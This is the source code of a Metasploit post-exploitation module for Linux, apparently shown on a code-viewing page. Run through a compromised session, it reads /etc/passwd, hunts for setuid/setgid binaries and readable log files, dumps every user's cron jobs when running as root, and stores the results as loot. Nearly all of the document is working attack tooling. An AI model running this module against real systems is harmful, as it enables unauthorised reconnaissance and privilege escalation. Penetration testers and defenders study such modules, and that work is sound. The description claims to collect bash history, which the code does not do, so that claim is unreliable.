Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::System
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Linux Gather System and User Information',
15
        'Description' => %q{
16
          This module gathers system information. We collect
17
          installed packages, installed services, mount information,
18
          user list, user bash history and cron jobs
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [
22
          'Carlos Perez <carlos_perez[at]darkoperator.com>', # get_packages and get_services
23
          'Stephen Haywood <averagesecurityguy[at]gmail.com>', # get_cron and original enum_linux
24
          'sinn3r', # Testing and modification of original enum_linux
25
          'ohdae <bindshell[at]live.com>', # Combined separate mods, modifications and testing
26
          'Roberto Espreto <robertoespreto[at]gmail.com>', # log files and setuid/setgid
27
        ],
28
        'Platform' => ['linux'],
29
        'SessionTypes' => ['shell', 'meterpreter']
30
      )
31
    )
32
  end
33

34
  def run
35
    distro = get_sysinfo
36
    store_loot(
37
      'linux.version',
38
      'text/plain',
39
      session,
40
      "Distro: #{distro[:distro]},Version: #{distro[:version]}, Kernel: #{distro[:kernel]}",
41
      'linux_info.txt',
42
      'Linux Version'
43
    )
44

45
    # Print the info
46
    print_good('Info:')
47
    print_good("\t#{distro[:version]}")
48
    print_good("\t#{distro[:kernel]}")
49

50
    users = execute('/bin/cat /etc/passwd | cut -d : -f 1')
51
    user = execute('/usr/bin/whoami')
52

53
    print_good("\tModule running as \"#{user}\" user")
54

55
    installed_pkg = get_packages(distro[:distro])
56
    installed_svc = get_services(distro[:distro])
57

58
    mount = execute('/bin/mount -l')
59
    crons = get_crons(users, user)
60
    diskspace = execute('/bin/df -ahT')
61
    disks = (mount + "\n\n" + diskspace)
62
    logfiles = execute('find /var/log -type f -perm -4 2> /dev/null')
63
    uidgid = execute('find / -xdev -type f -perm +6000 -perm -1 2> /dev/null || find / -xdev -type f -perm /6000 -perm -1 2> /dev/null')
64

65
    save('Linux version', distro)
66
    save('User accounts', users)
67
    save('Installed Packages', installed_pkg)
68
    save('Running Services', installed_svc)
69
    save('Cron jobs', crons)
70
    save('Disk info', disks)
71
    save('Logfiles', logfiles)
72
    save('Setuid/setgid files', uidgid)
73
    save('CPU Vulnerabilities', get_cpu_vulnerabilities)
74
  end
75

76
  def save(msg, data, ctype = 'text/plain')
77
    ltype = 'linux.enum.system'
78
    loot = store_loot(ltype, ctype, session, data, nil, msg)
79
    print_status("#{msg} stored in #{loot}")
80
  end
81

82
  def execute(cmd)
83
    vprint_status("Execute: #{cmd}")
84
    output = cmd_exec(cmd)
85
    output
86
  end
87

88
  def get_packages(distro)
89
    packages_installed = ''
90
    case distro
91
    when /fedora|redhat|suse|mandrake|oracle|amazon/
92
      packages_installed = execute('rpm -qa')
93
    when /slackware/
94
      packages_installed = execute('/bin/ls /var/log/packages')
95
    when /ubuntu|debian/
96
      packages_installed = execute('/usr/bin/dpkg -l')
97
    when /gentoo/
98
      packages_installed = execute('equery list')
99
    when /arch/
100
      packages_installed = execute('/usr/bin/pacman -Q')
101
    else
102
      print_error('Could not determine package manager to get list of installed packages')
103
    end
104
    packages_installed
105
  end
106

107
  def get_services(distro)
108
    services_installed = ''
109
    case distro
110
    when /fedora|redhat|suse|mandrake|oracle|amazon/
111
      services_installed = execute('/sbin/chkconfig --list')
112
    when /slackware/
113
      services_installed << "\nEnabled:\n*************************\n"
114
      services_installed << execute("ls -F /etc/rc.d | /bin/grep \'*$\'")
115
      services_installed << "\n\nDisabled:\n*************************\n"
116
      services_installed << execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")
117
    when /ubuntu|debian/
118
      services_installed = execute('/usr/sbin/service --status-all')
119
    when /gentoo/
120
      services_installed = execute('/bin/rc-status --all')
121
    when /arch/
122
      services_installed = execute("/bin/egrep '^DAEMONS' /etc/rc.conf")
123
    else
124
      print_error('Could not determine the Linux Distribution to get list of configured services')
125
    end
126
    services_installed
127
  end
128

129
  def get_cpu_vulnerabilities
130
    execute('grep -r . /sys/devices/system/cpu/vulnerabilities').to_s
131
  end
132

133
  def get_crons(users, user)
134
    if user == 'root' && users
135
      users = users.chomp.split
136
      users.each do |u|
137
        next unless u == 'root'
138

139
        vprint_status('Enumerating as root')
140
        cron_data = ''
141
        users.each do |usr|
142
          cron_data << "*****Listing cron jobs for #{usr}*****\n"
143
          cron_data << execute("crontab -u #{usr} -l") + "\n\n"
144
        end
145
      end
146
    else
147
      vprint_status("Enumerating as #{user}")
148
      cron_data = "***** Listing cron jobs for #{user} *****\n\n"
149
      cron_data << execute('crontab -l')
150

151
      # Save cron data to loot
152
      cron_data
153
    end
154
  end
155
end
156

157